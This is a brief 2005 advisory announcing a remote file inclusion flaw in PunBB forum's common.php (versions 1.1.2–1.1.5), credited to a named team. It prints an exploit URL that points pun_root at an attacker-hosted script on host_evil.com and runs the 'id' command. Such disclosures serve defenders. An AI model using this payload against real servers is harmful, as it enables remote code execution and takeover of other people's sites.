Remote File Inclusion in forum PunBB Date:24/10/2005 Severity: High version: 1.1.2 >> 1.1.5 The bug reside in common.php Exploit : http://www.host.com/forum/include/common.php?pun_root=http://www.host_evil.com/cmd?&=id Discovery by RoDheDoR L-G-H Team http://www.lezr.com _________________________________________________________________FREE pop-up blocking with the new MSN Toolbar - get it now! http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/